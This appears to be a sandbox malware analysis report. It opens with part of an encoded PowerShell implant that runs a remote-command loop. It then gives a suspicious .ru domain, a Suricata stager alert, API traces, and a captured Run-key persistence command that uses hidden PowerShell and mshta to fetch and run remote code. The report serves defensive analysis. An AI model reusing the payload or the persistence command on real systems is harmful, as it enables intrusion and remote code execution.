HQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQAgAC0AVABhAHMAawBQAGEAdABoACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJABUAGEAcwBrADsAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAWABhAE4AcwBZAEoAYgBYAGoAVABuACAAJABIAFoAZwBxAGYAQgBLAFgAIAAkAHMARQBLAGMARABYAHIAWQBhAEkAVgB3AGYAOwB9AH0AaQBmACAAKAAkAGMAaQBlAC4AQwBvAG4AdABhAGkAbgBzACgAJwB6AGkAcAA6ACcAKQApAHsAJABNAGUAagBYAEMAPQAkAGMAaQBlAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA0ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAE0AZQBqAFgAQwAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAzACkAewBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQA7ACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmADsAfQB9AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAG4AYQBtAGUAOgAnACkAKQB7ACQATQBlAGoAWABDAD0AJABjAGkAZQAuAFMAdQBiAFMAdAByAGkAbgBnACgANwApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABNAGUAagBYAEMALgBTAHAAbABpAHQAKAAnAHwAfAAnACkAOwBpAGYAIAAoACQAQwBoAGEAcgBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAAgAC0AZQBxACAAMwApAHsAUgBlAG4AYQBtAGUALQBJAHQAZQBtACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAHMARQBLAGMARABYAHIAWQBhAEkAVgB3AGYAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBYAGEATgBzAFkASgBiAFgAagBUAG4AIAAkAEgAWgBnAHEAZgBCAEsAWAAgACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgA7AH0AfQBpAGYAIAAoACQAYwBpAGUALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAZQBsADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABNAGUAagBYAEMAOwAkAHMARQBLAGMARABYAHIAWQBhAEkAVgB3AGYAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBYAGEATgBzAFkASgBiAFgAagBUAG4AIAAkAEgAWgBnAHEAZgBCAEsAWAAgACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgA7AH0AfQB9AH0AfQAgAEMAYQB0AGMAaAB7AH0AUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AdwBoAGkAbABlACgAJAB0AHIAdQBlACAALQBlAHEAIAAkAHQAcgB1AGUAKQA=
      3040

Name	Response	Post-Analysis Lookup
navercorp.ru	A 46.254.21.69	46.254.21.69

IP Address	Status	Action
164.124.101.2	Active	Moloch
46.254.21.69	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 46.254.21.69:80 -> 192.168.56.101:49172	2026989	ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 4, 2023, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 4, 2023, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 4, 2023, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 4, 2023, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 4, 2023, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 4, 2023, 10:28 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 4, 2023, 10:28 a.m.			0	0

Command line console output was observed (10 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 4, 2023, 10:29 a.m.	buffer: PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\M console_handle: 0x000000000000001f	1	1
WriteConsoleW Sept. 4, 2023, 10:29 a.m.	buffer: icrosoft\Windows\CurrentVersion\Run console_handle: 0x0000000000000023	1	1
WriteConsoleW Sept. 4, 2023, 10:29 a.m.	buffer: PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\M console_handle: 0x0000000000000027	1	1
WriteConsoleW Sept. 4, 2023, 10:29 a.m.	buffer: icrosoft\Windows\CurrentVersion console_handle: 0x000000000000002b	1	1
WriteConsoleW Sept. 4, 2023, 10:29 a.m.	buffer: PSChildName : Run console_handle: 0x000000000000002f	1	1
WriteConsoleW Sept. 4, 2023, 10:29 a.m.	buffer: PSDrive : HKCU console_handle: 0x0000000000000033	1	1
WriteConsoleW Sept. 4, 2023, 10:29 a.m.	buffer: PSProvider : Microsoft.PowerShell.Core\Registry console_handle: 0x0000000000000037	1	1
WriteConsoleW Sept. 4, 2023, 10:29 a.m.	buffer: fGZtM : c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidde console_handle: 0x000000000000003b	1	1
WriteConsoleW Sept. 4, 2023, 10:29 a.m.	buffer: n -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 console_handle: 0x000000000000003f	1	1
WriteConsoleW Sept. 4, 2023, 10:29 a.m.	buffer: \|\| mshta http://navercorp.ru/dashboard/image/202302/4.html console_handle: 0x0000000000000043	1	1

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000024f7d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b444d40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b444d40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b444d40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b444cd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b444cd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b444d40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b444d40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b444d40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b444d40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b4451a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b4451a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b4451a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b444640 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b444640 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b444640 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b445440 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b445440 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b445440 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b445440 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b445440 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b445440 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b445440 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b445440 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b445520 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b445520 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b445520 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b42a9a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b42a9a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b42ab60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b42ab60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b42abd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b42abd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b42abd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b46be50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b46be50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b46bec0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b46bec0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b46c9b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b46c9b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b46cc50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 10:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b46cc50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 4, 2023, 10:27 a.m.		1	1	0

Performs some HTTP requests (1 event)

request

GET http://navercorp.ru/dashboard/image/202302/4.html

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

navercorp.ru

description

Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 190 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 4, 2023, 10:27 a.m.	process_identifier: 2668 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:27 a.m.	process_identifier: 2880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 1835008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002900000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3181000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33fe000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33fe000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33ff000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33ff000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33ff000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33ff000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33ff000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33ff000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33ff000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33ff000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3400000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3400000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3400000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3400000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3400000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3401000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3401000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3401000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3401000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef33fe000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00022000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00122000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000fd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
